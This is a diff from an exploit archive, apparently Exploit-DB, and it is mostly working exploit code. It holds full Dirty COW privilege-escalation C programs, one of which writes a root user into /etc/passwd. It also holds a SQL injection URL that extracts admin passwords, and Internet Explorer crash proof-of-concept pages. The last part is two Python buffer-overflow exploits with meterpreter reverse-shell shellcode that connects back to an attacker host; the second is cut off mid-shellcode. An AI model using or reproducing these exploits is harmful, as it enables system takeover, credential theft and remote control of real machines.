 // $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball
 #include <fcntl.h>                        //// pikachu
 #include <pthread.h>                      //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball
 #include <string.h>                       //// pokeball
 #include <stdio.h>                        ////    (___)
 #include <stdint.h>                       ////    (o o)_____/
 #include <sys/mman.h>                     ////     @@ `     \ 
 #include <sys/types.h>                    ////      \ ____, /miltank
 #include <sys/stat.h>                     ////      //    //
 #include <sys/wait.h>                     ////     ^^    ^^
 #include <sys/ptrace.h>                   //// mmap bc757000
 #include <unistd.h>                       //// madvise 0
 ////////////////////////////////////////////// ptrace 0
 ////////////////////////////////////////////// miltank
 //////////////////////////////////////////////
 int f                                      ;// file descriptor
 void *map                                  ;// memory map
 pid_t pid                                  ;// process id
 pthread_t pth                              ;// thread
 struct stat st                             ;// file info
 //////////////////////////////////////////////
 void *madviseThread(void *arg)             {// madvise thread
  int i,c=0                                ;// counters
  for(i=0;i<200000000;i++)//////////////////// loop to 2*10**8
    c+=madvise(map,100,MADV_DONTNEED)      ;// race condition
  printf("madvise %d\n\n",c)               ;// sum of errors
                                           }// /madvise thread
 //////////////////////////////////////////////
 int main(int argc,char *argv[])            {// entrypoint
  if(argc<3)return 1                       ;// ./d file contents
  printf("%s                               \n\
   (___)                                   \n\
   (o o)_____/                             \n\
    @@ `     \\                            \n\
     \\ ____, /%s                          \n\
     //    //                              \n\
    ^^    ^^                               \n\
 ", argv[1], argv[2])                       ;// dirty cow
  f=open(argv[1],O_RDONLY)                 ;// open read only file
  fstat(f,&st)                             ;// stat the fd
  map=mmap(NULL                            ,// mmap the file
           st.st_size+sizeof(long)         ,// size is filesize plus padding
           PROT_READ                       ,// read-only
           MAP_PRIVATE                     ,// private mapping for cow
           f                               ,// file descriptor
           0)                              ;// zero
  printf("mmap %lx\n\n",(unsigned long)map);// sum of error code
  pid=fork()                               ;// fork process
  if(pid)                                  {// if parent
    waitpid(pid,NULL,0)                    ;// wait for child
    int u,i,o,c=0,l=strlen(argv[2])        ;// util vars (l=length)
    for(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l
      for(o=0;o<l;o++)//////////////////////// repeat for each byte
        for(u=0;u<10000;u++)////////////////// try 10K times each time
          c+=ptrace(PTRACE_POKETEXT        ,// inject into memory
                    pid                    ,// process id
                    map+o                  ,// address
                    *((long*)(argv[2]+o))) ;// value
    printf("ptrace %d\n\n",c)              ;// sum of error code
                                           }// otherwise
  else                                     {// child
    pthread_create(&pth                    ,// create new thread
                   NULL                    ,// null
                   madviseThread           ,// run madviseThred
                   NULL)                   ;// null
    ptrace(PTRACE_TRACEME)                 ;// stat ptrace on child
    kill(getpid(),SIGSTOP)                 ;// signal parent
    pthread_join(pth,NULL)                 ;// wait for thread
                                           }// / child
  return 0                                 ;// return
                                           }// / entrypoint
 //////////////////////////////////////////////
--- a/platforms/linux/local/40839.c
+++ b/platforms/linux/local/40839.c
@ -0,0 +1,181 @@
 //
 // This exploit uses the pokemon exploit as a base and automatically
 // generates a new passwd line. The original /etc/passwd is then
 // backed up to /tmp/passwd.bak and overwritten with the new line.
 // The user will be prompted for the new password when the binary is run.
 // After running the exploit you should be able to login with the newly
 // created user.
 //
 // Original exploit:
 // https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
 //
 // To use this exploit modify the user values according to your needs
 //
 // Compile with
 //
 // gcc -pthread dirty.c -o dirty -lcrypt
 //
 // and just run the newly create binary with ./dirty
 //
 // DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT !
 //
 // Exploit adopted by Christian "FireFart" Mehlmauer
 // https://firefart.at
 //
 #include <fcntl.h>
 #include <pthread.h>
 #include <string.h>
 #include <stdio.h>
 #include <stdint.h>
 #include <sys/mman.h>
 #include <sys/types.h>
 #include <sys/stat.h>
 #include <sys/wait.h>
 #include <sys/ptrace.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <crypt.h>
 const char *filename = "/etc/passwd";
 const char *backup_filename = "/tmp/passwd.bak";
 const char *salt = "firefart";
 int f;
 void *map;
 pid_t pid;
 pthread_t pth;
 struct stat st;
 struct Userinfo {
   char *username;
   char *hash;
   int user_id;
   int group_id;
   char *info;
   char *home_dir;
   char *shell;
 };
 char *generate_password_hash(char *plaintext_pw) {
  return crypt(plaintext_pw, salt);
 }
 char *generate_passwd_line(struct Userinfo u) {
  const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
  int size = snprintf(NULL, 0, format, u.username, u.hash,
    u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  char *ret = malloc(size + 1);
  sprintf(ret, format, u.username, u.hash, u.user_id,
    u.group_id, u.info, u.home_dir, u.shell);
  return ret;
 }
 void *madviseThread(void *arg) {
  int i, c = 0;
  for(i = 0; i < 200000000; i++) {
    c += madvise(map, 100, MADV_DONTNEED);
  }
  printf("madvise %d\n\n", c);
 }
 int copy_file(const char *from, const char *to) {
  // check if target file already exists
  if(access(to, F_OK) != -1) {
    printf("File %s already exists! Please delete it and run again\n",
      to);
    return -1;
  }
  char ch;
  FILE *source, *target;
  source = fopen(from, "r");
  if(source == NULL) {
    return -1;
  }
  target = fopen(to, "w");
  if(target == NULL) {
     fclose(source);
     return -1;
  }
  while((ch = fgetc(source)) != EOF) {
     fputc(ch, target);
   }
  printf("%s successfully backed up to %s\n",
    from, to);
  fclose(source);
  fclose(target);
  return 0;
 }
 int main(int argc, char *argv[])
 {
  // backup file
  int ret = copy_file(filename, backup_filename);
  if (ret != 0) {
    exit(ret);
  }
  struct Userinfo user;
  // set values, change as needed
  user.username = "firefart";
  user.user_id = 0;
  user.group_id = 0;
  user.info = "pwned";
  user.home_dir = "/root";
  user.shell = "/bin/bash";
  char *plaintext_pw = getpass("Please enter new password: ");
  user.hash = generate_password_hash(plaintext_pw);
  char *complete_passwd_line = generate_passwd_line(user);
  printf("Complete line:\n%s\n", complete_passwd_line);
  f = open(filename, O_RDONLY);
  fstat(f, &st);
  map = mmap(NULL,
             st.st_size + sizeof(long),
             PROT_READ,
             MAP_PRIVATE,
             f,
             0);
  printf("mmap: %lx\n",(unsigned long)map);
  pid = fork();
  if(pid) {
    waitpid(pid, NULL, 0);
    int u, i, o, c = 0;
    int l=strlen(complete_passwd_line);
    for(i = 0; i < 10000/l; i++) {
      for(o = 0; o < l; o++) {
        for(u = 0; u < 10000; u++) {
          c += ptrace(PTRACE_POKETEXT,
                      pid,
                      map + o,
                      *((long*)(complete_passwd_line + o)));
        }
      }
    }
    printf("ptrace %d\n",c);
  }
  else {
    pthread_create(&pth,
                   NULL,
                   madviseThread,
                   NULL);
    ptrace(PTRACE_TRACEME);
    kill(getpid(), SIGSTOP);
    pthread_join(pth,NULL);
  }
  printf("Done! Check %s to see if the new user was created\n", filename);
  printf("You can log in with username %s and password %s.\n\n",
    user.username, plaintext_pw);
  printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
    filename, backup_filename);
  return 0;
 }
--- a/platforms/php/webapps/6927.txt
+++ b/platforms/php/webapps/6927.txt
@ -1,44 +0,0 @@
 ###############################################################
 #################### Viva IslaM Viva IslaM ####################
 ##
 ## Remote SQL injection Vulnerability
 ##
 ## AJ ARTICLE ( featured_article.php mode )
 ##                            
 ###############################################################
 ###############################################################
 ##
 ## AuTh0r : Mr.SQL
 ##
 ## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
 ##
 ## Email  : SQL@Hotmail.it
 ##
 ## SYRiAN Arab HACkErS
 ########################
 ########################
 ##
 ##  Name : AJ ARTICLE
 ##
 ##  Site : www.ajsquare.com
 ##
 ########################
 ########################
 ##
 ##  -(:: L!VE DEMO ::)-
 ##
 ##  http://www.ajsquare.com/products/demo/featured_article.php?mode=detail&page=&artid=-109+union+select+0,0,0,0,concat_ws(0x3a,username,admin_password),0,0,0,0,0,0,0+from+admin--
 ##
 ########################
 ########################
 #######################################################################################################
 #######################################################################################################
                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
 :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
 #######################################################################################################
 #######################################################################################################
 # milw0rm.com [2008-11-01]
--- a/platforms/windows/dos/40841.html
+++ b/platforms/windows/dos/40841.html
@ -0,0 +1,69 @@
 <!--
 Source: http://blog.skylined.nl/20161122001.html
 Synopsis
 A specially crafted web-page can cause Microsoft Internet Explorer 8 to attempt to read data beyond the boundaries of a memory allocation. The issue does not appear to be easily exploitable.
 Known affected software, attack vectors and mitigations
 Microsoft Internet Explorer 8
 An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
 Repro.html:
 -->
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
  <style>
    position_fixed {  position: fixed; }
    position_relative { position: relative;  }
    float_left { float: left; }
    complex { float: left; width: 100%; }
    complex:first-line { clear: left; }
  </style>
  <script>
    window.onload = function boom() {
      oElement_float_left = document.createElement('float_left');
      oElement_complex = document.createElement('complex');
      oElement_position_fixed = document.createElement('position_fixed');
      oElement_position_relative = document.createElement('position_relative');
      oElement_table = document.createElement('table');
      oElement_x = document.createElement('x');
      oTextNode = document.createTextNode('x');
      document.documentElement.appendChild(oElement_float_left);
      oElement_float_left.appendChild(oElement_complex);
      oElement_float_left.appendChild(oTextNode);
      oElement_complex.appendChild(oElement_position_fixed);
      oElement_complex.appendChild(oElement_position_relative);
      oElement_complex.appendChild(oElement_table);
      oElement_complex.appendChild(oElement_x);
      setTimeout(function() {
        oElement_x.setAttribute('class', 'x');
        setTimeout(function() {
          alert();
          document.write(0);
        }, 0);
      }, 0);
    }
  </script>
  </head>
 </html>
 <!--
 Description
 The issue requires rather complex manipulation of the DOM and results in reading a value immediately following an object. The lower three bits of this value are returned by the function doing the reading, resulting in a return value in the range 0-7. After exhaustively skipping over the read AV and having that function return each value, no other side effects were noticed. For that reason I assume this issue is hard if not impossible to exploit and did not investigate further. It is still possible that there may be subtle effects that I did not notice that allow exploitation in some form or other.
 Time-line
 June 2014: This vulnerability was found through fuzzing.
 October 2014: This vulnerability was submitted to ZDI.
 October 2014: This vulnerability was rejected by ZDI.
 November 2014: This vulnerability was reported to MSRC.
 February 2015: This vulnerability was addressed by Microsoft in MS15-009.
 November 2016: Details of this issue are released.
 -->
--- a/platforms/windows/dos/40843.html
+++ b/platforms/windows/dos/40843.html
@ -0,0 +1,175 @@
 <!--
 Source: http://blog.skylined.nl/20161124001.html
 Synopsis
 A specially crafted web-page can cause a type confusion in HTML layout in Microsoft Internet Explorer 11. An attacker might be able to exploit this issue to execute arbitrary code.
 Known affected software and attack vectors
 Microsoft Internet Explorer 11
 An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
 Repro.html:
 -->
 <html>
  <head>
    <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
    <script>
      window.onload = function () {
        document.getElementsByTagName("iframe")[0].src = "repro-iframe.html";
      }
    </script>
  </head>
  <body>
    <iframe></iframe>
  </body>
 </html>
 <!--
 Repro-iframe.html:
 <svg><path marker-start="url(#)"><title><q><button>
 Description
 Internally MSIE uses various lists of linked CTreePos objects to represent the DOM tree. For HTML/SVG elements a CTreeNode element is created, which embeds two CTreePos instances: one that contains information about the first child of the element and one that indicates the next sibling or parent of the element. For text nodes an object containing only one CTreePos is created, as such nodes never have any children. CTreePos instances have various flags set. This includes a flag that indicates if they are the first (fTPBegin) or second (fTPEnd) CTreePos instance for an element, or the only instance for a test node (fTPText).
 The CTreePos::Branch method of an CTreePos instance embedded in a CTreeNode can be used to calculate a pointer to the CTreeNode. It determines if the CTreePos instance is the first or second in the CTreeNode by looking at the fTPBegin flag and subtract the offset of this CTreePos object in a CTreeNode object to calculate the address of the later. This method assumes that the CTreePos instance is part of a CTreeNode and not a TextNode. It will yield invalid results when called on the later. In a TextNode, the CTreePos does not have the fTPBegin flag set, so the code assumes this is the second CTreePos instance in a CTreeNode object and subtracts 0x24 from its address to calculate the address of the CTreeNode. Since the CTreePos instance is the first element in a TextNode, the returned address will be 0x24 bytes before the TextNode, pointing to memory that is not part of the object.
 Note that this behavior is very similar to another issue I found around the same time, in that that issues also caused the code to access memory 0x24 bytes before the start of a memory region containing an object. Looking back I believe that both issues may have had the same root cause and were fixed at the same time.
 The CGeneratedContent::HasGeneratedSVGMarker method walks the DOM using one of the CTreePos linked lists. It looks for any descendant node of an element that has a CTreePos instance with a specific flag set. If found, the CTreePos::Branch method is called to find the related CTreeNode, without checking if the CTreePos is indeed part of a CTreeNode. If a certain flag is set on this CTreeNode, it returns true. Otherwise it continues scanning. If nothing is found, it returns false.
 The repro creates a situation where the CGeneratedContent::HasGeneratedSVGMarker method is called on an SVG path element which has a TextNode instance as a descendant with the right flags set to cause it to call CTreePos::Branch on this TextNode. This leads to type confusion/a bad cast where a pointer that points before a TextNode is used as a pointer to a CTreeNode.
 Reversed code
 While reversing the relevant parts, I created the following pseudo-code to illustrate the issue:
 enum eTreePosFlags {
  fTPBegin =           0x01, // if set, this is a markup node
  fTPEnd =             0x02, // if set, this is a markup node
  fTPText =            0x04, // if set, this is a markup node
  fTPPointer =         0x08, // if set, this is not a markup node
  fTPTypeMask =        0x0f
  fTPLeftChild =       0x10,
  fTPLastChild =       0x20, // poNextSiblingOrParent => fTPLastChild ? parent : sibling
  fTPData2Pos =        0x40, // valid if fTPPointer is set
  fTPDataPos =         0x80,
  fTPUnknownFlag100 = 0x100, // if set, this is not a markup node
 }
 struct CTreePos {
  /*offs size*/                                             // THE BELOW ARE BEST GUESSES BASED ON INADEQUATE INFORMATION!!
  /*0000 0004*/ eTreePosType  fFlags00;                     
  /*0004 0004*/ UINT          uCharsCount04;                // Seems to be counting some chars - not sure what exactly
  /*0008 0004*/ CTreePos*     poFirstChild;                 // can be NULL if no children exist.
  /*000C 0004*/ CTreePos*     poNextSiblingOrParent;        // fFlags00 & fTPLastChild ? parent end tag : sibling start tag
  /*0010 0004*/ CTreePos*     poThreadLeft10;               // fFlags00 & fTPBegin ? previous sibling or parent : last child or start tag
  /*0014 0004*/ CTreePos*     poThreadRight14;              // fFlags00 & fTPBegin ? first child or end tag : 
  /*0018 0004*/ flags  (0x10 = something with CDATA         
  /*0028 0004*/                                             
 }                                                           
 struct CTreeNode {
  /*offs size*/                                             // THE BELOW ARE BEST GUESSES BASED ON INADEQUATE INFORMATION!!
  /*0000 0004*/ CElement*     poElement00;                  
  /*0004 0004*/ CTreeNode*    poParent04;                   
  /*0008 0004*/ DWORD         dwUnknown08;                  // flags?
  /*000C 0018*/ CTreePos      oTreePosBegin0C;              // represents the position in the document immediately before the start tag
  /*0024 0018*/ CTreePos      oTreePosEnd24;                // represents the position in the document immediately after the end tag
  /*003C ????*/ Unknown
 }
 struct TextNode { // I did not figure out what this is called in MSIE
  /*0000 0018*/ CTreePos      oTreePosEnd00;                // represents the position in the document immediately after the node.
  /*0018 0014*/ Unknown
 }
 CTreeNode* CTreePos::Branch() {
  // Given a pointer to a CTreePos instance in a CTreeNode instance, calculate a pointer to the CTreeNode instance.
  // The CTreePos instance must be either the oTreePosBegin0C (oTreePosBegin0C->fFlags00 & fTPBegin != 0) or the
  // oTreePosEnd24 (oTreePosEnd24->fFlags00 & fTPEnd != 0).
  BOOL bIsTreePosBegin0C = this->fFlags00 & fTPBegin;
  INT uOffset = offsetof(CTreeNode, bIsTreePosBegin0C ? oTreePosBegin0C : oTreePosEnd24);
  return (CTreeNode*)((BYTE*)this - uOffset);
 }
 BOOL CGeneratedContent::HasGeneratedSVGMarker() {
  for (
    CTreePos* poCurrentTreePos = this->oTreePosBegin0C.poThreadRight14,
      CTreePos* poEndTreePos = &(this->oTreePosEnd24);
    poCurrentTreePos != poEndTreePos;
    poCurrentTreePos = poCurrentTreePos->poThreadRight14
  ) {
    if (poCurrentTreePos->fFlags00 & fTPUnknownFlag100) {
      // Calling Branch is only valid in the context of CTreePos embedded in a CTreeNode, so the code should check for
      // the presence of fTPBegin or fTPEnd in fFlags00 before doing so. This line of code may fix the issue:
      // if (poCurrentTreePos->fFlags00 & (fTPBegin | fTPEnd) == 0) continue;
      CTreeNode* poTreeNode = poCurrentTreePos->Branch();
      if (poTreeNode && poTreeNode->dw64 == 20) {
          return 1
      }
    }
  }
  return 0
 }
 DOM Tree
 If you replace the <q> tag with an <a> tag in the repro, or insert a <script> tag before the <svg> tag, the repro does not trigger an access violation. At that point it is possible to use document.documentElement.outerHTML as well as recursively walk document.documentElement.childNodes to get an idea of what the DOM tree looks like around the time of the crash.
 document.documentElement.outerHTML:
 <html>
  <head>
  </head>
  <body>
    <svg xmlns="http://www.w3.org/2000/svg">
      <path marker-start="url("#")">
        <title>
          <q>
            <button>                    // no closing tag.
            <script>                    // script is a sibling of button
              #text                     // snipped
            </script>
          </q>
        </title>                        // Things get really weird here:
        </title>
      </path>                           // all svg close tags are doubled!?
      </path>
    </svg>                              // Not sure what this means.
    </svg>
  </body>
 </html>
 Walking document.documentElement.childNodes:
 <html>
  <head>
  <body>
    <svg>                               // I did not look at attributes
      <path>                            // ^^^ same here
        <title>
          <q>
            <button>
              <script>                  // script is a child of button
                #text                   // snipped
 Exploit
 I did not find any code path that could lead to exploitation. However, I did not do a thorough step through of the code to find out if and how I might control execution flow upwards in the stack. Also, it appears trivial to have MSIE survive the initial crash by massaging the heap. It might be possible that other methods are affected by a similar issue and that further DOM manipulations can be used to trigger a more interesting code path.
 Time-line
 July 2014: This vulnerability was found through fuzzing.
 September 2014: This vulnerability was submitted to ZDI.
 September 2014: This vulnerability appears to have been fixed.
 October 2014: This vulnerability was rejected by ZDI.
 November 2016: Details of this issue are released.
 -->
--- a/platforms/windows/dos/40844.html
+++ b/platforms/windows/dos/40844.html
@ -0,0 +1,55 @@
 <!--
 Source: http://blog.skylined.nl/20161125001.html
 Synopsis
 A specially crafted web-page can cause Microsoft Internet Explorer 10 to continue to use an object after freeing the memory used to store the object. An attacker might be able to exploit this issue to execute arbitrary code.
 Known affected software and attack vectors
 Microsoft Internet Explorer 10
 An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
 Repro.html:
 -->
 <!DOCTYPE html>
 <html>
  <head>
    <script>
      var oWindow = window.open("window.xhtml");
      setInterval(function () {
        try {
          oWindow.eval("(" + function () {
            document.designMode = "on";
            document.execCommand("SelectAll");
            var oSelection = window.getSelection();
            oSelection.collapse(document,1);
            document.execCommand("InsertImage", false);
            document.designMode="off";
          } + ")()");
        } catch (e) {}
      }, 1);
    </script>
  </head>
 </html>
 Window.xhtml
 <!-- comment --><html xmlns="http://www.w3.org/1999/xhtml">
 </html>
 <!--
 Description
 The last line of script (designMode = "off") will cause some cleanup in MSIE, which appears to trigger use of a stale pointer in CEditAdorner::Detach. I did not investigate further.
 Time-line
 November 2012: This vulnerability was found through fuzzing.
 November 2012: This vulnerability was submitted to EIP.
 December 2012: This vulnerability was rejected by EIP.
 January 2013: This vulnerability was submitted to ZDI.
 March 2013: This vulnerability was acquired by ZDI.
 June 2013: This issue was addressed by Microsoft in MS13-047.
 November 2016: Details of this issue are released.
 -->
--- a/platforms/windows/dos/40845.txt
+++ b/platforms/windows/dos/40845.txt
@ -0,0 +1,65 @@
 Source: http://blog.skylined.nl/20161128001.html
 Synopsis
 A specially crafted web-page can cause a type confusion vulnerability in Microsoft Internet Explorer 8 through to 11. An attacker can cause code to be executed with a stack layout it does not expect, or have code attempt to execute a method of an object using a vftable, when that object does not have a vftable. Successful exploitation can lead to arbitrary code execution.
 Known affected software and attack vectors
 Microsoft Internet Explorer 8, 9, 10 and 11
 An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
 1 Repro.svg:
 <script xmlns="http://www.w3.org/2000/svg">
  window.exploit = function(w) {
    o={x:w.DOMImplementation(0).prototype.hasFeature};
    o.x();
  };
  open("1 Target.html");
 </script>
 1 Target.html:
 <script>
  opener.exploit(window);
 </script>
 Description
 In an SVG page, a copy of the hasFeature method of a DOMImplementation object from a HTML page is created. This copy is used as a method of a new object and called with one argument. This can cause at least two issues in the MSHTML!Method_VARIANTBOOLp_BSTR_o0oVARIANT function of MSIE:
 A Failfast exception when the code detects that calling a method of an object has not cleaned up the stack as expected; this is because the called function appears to expect a different number of arguments or a different calling convention. This issue can be triggered by changing the line o.x(); in the repro to o.x(new Array).
 An out-of-bounds write when MSHTML!CBase::PrivateGetDispID is called; this is probably caused by a type confusion bug: the code expects a VARIANT object of one type, but is working on an object of a different type.
 The repro was tested on x86 systems and does not reproduce this issue on x64 systems. I did not determine if this is because x64 systems are not affected, or because the repro needs to be modified to work on x64 systems.
 Exploit
 Exploitation was not attempted. I reversed Method_VARIANTBOOLp_BSTR_o0oVARIANT only sufficiently to get an idea of the root cause, but not enough to determine exactly what is going on or how to control the issue for command execution.
 2 Repro.html:
 <body onload=open("2 Target.html")>
 2 Target.html:
 <meta http-equiv=X-UA-Compatible content=IE=11><body onload=x=opener.DOMImplementation(0).prototype.isPrototypeOf;x()>
 Description
 Calling the isPrototypeOf method of the DOMImplementation interface as a function results in type confusion where an object is assumed to implement IUnknown when in fact it does not. The code attempts to call the Release method of IUnknown through the vftable at offset 0, but since the object has no vftables, a member property is stored at this offset, which appears to have a static value 002dc6c0. An attacker that is able to control this value, or allocate memory and store data at that address, may be able to execute arbitrary code.
 Exploit
 No attempts were made to further reverse the code and determine the exact root cause. A few attempts were made to control the value at offset 0 of the object in question, as well as get another object in its place with a different value at this location, but both efforts were brief and unsuccessful.
 Time-line
 September 2015: This vulnerability was found through fuzzing.
 October 2015: This vulnerability was submitted to ZDI.
 November 2015: This vulnerability was acquired by ZDI.
 February 2016: This issue was addressed by Microsoft in MS16-009.
 November 2016: Details of this issue are released.
--- a/platforms/windows/remote/40830.py
+++ b/platforms/windows/remote/40830.py
@ -0,0 +1,100 @@
 #!/usr/bin/python
 print "VX Search Enterprise 9.1.12 Login Buffer Overflow"
 print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
 #Author website: www.tulpa-security.com
 #Author twitter: @tulpa_security
 #Exploit will land you NT AUTHORITY\SYSTEM
 #You do not need to be authenticated, password below is garbage
 #Swop out IP, shellcode and remember to adjust '\x41' for bytes
 #Tested on Windows 7 x86 Enterprise SP1
 #Vendor has been notified on multiple occasions
 #Exploit for version 9.0.26: www.exploit-db.com/exploits/40455/
 #Shout-out to carbonated and ozzie_offsec
 import socket
 import sys
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 connect=s.connect(('192.168.123.130',80))
 #bad chars \x00\x0a\x0d\x26
 #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
 #payload size 308
 buf =  ""
 buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
 buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
 buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
 buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
 buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
 buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
 buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
 buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
 buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
 buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
 buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
 buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
 buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
 buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
 buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
 buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
 buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
 buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
 buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
 buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
 buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
 buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
 buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
 buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
 #pop pop ret 10015BBE
 nseh = "\x90\x90\xEB\x0B"
 seh = "\xBE\x5B\x01\x10"
 egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
 egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
 evil =  "POST /login HTTP/1.1\r\n"
 evil += "Host: 192.168.123.132\r\n"
 evil += "User-Agent: Mozilla/5.0\r\n"
 evil += "Connection: close\r\n"
 evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
 evil += "Accept-Language: en-us,en;q=0.5\r\n"
 evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
 evil += "Keep-Alive: 300\r\n"
 evil += "Proxy-Connection: keep-alive\r\n"
 evil += "Content-Type: application/x-www-form-urlencoded\r\n"
 evil += "Content-Length: 17000\r\n\r\n"
 evil += "username=admin"
 evil += "&password=aaaaa\r\n"
 evil += "\x41" * 13664 #subtract/add for payload
 evil += "B" * 100
 evil += "w00tw00t"
 evil += buf
 evil += "\x90" * 212
 evil += nseh
 evil += seh
 evil += "\x90" * 10
 evil += egghunter
 evil += "\x90" * 8672
 print 'Sending evil buffer...'
 s.send(evil)
 print 'Payload Sent!'
 s.close()
--- a/platforms/windows/remote/40831.py
+++ b/platforms/windows/remote/40831.py
@ -0,0 +1,100 @@
 #!/usr/bin/python
 print "Sync Breeze Enterprise 9.1.16 Login Buffer Overflow"
 print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
 #Author website: www.tulpa-security.com
 #Author twitter: @tulpa_security
 #Exploit will land you NT AUTHORITY\SYSTEM
 #You do not need to be authenticated, password below is garbage
 #Swop out IP, shellcode and remember to adjust '\x41' for bytes
 #Tested on Windows 7 x86 Enterprise SP1
 #Vendor has been notified on multiple occasions
 #Exploit for version 8.9.24: www.exploit-db.com/exploits/40456/
 #Shout-out to carbonated and ozzie_offsec
 import socket
 import sys
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 connect=s.connect(('192.168.123.130',80))
 #bad chars \x00\x0a\x0d\x26
 #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
 #payload size 308
 buf =  ""
 buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
 buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
 buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
 buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
 buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
 buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
 buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
 buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
 buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
 buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
 buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
 buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
 buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
 buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
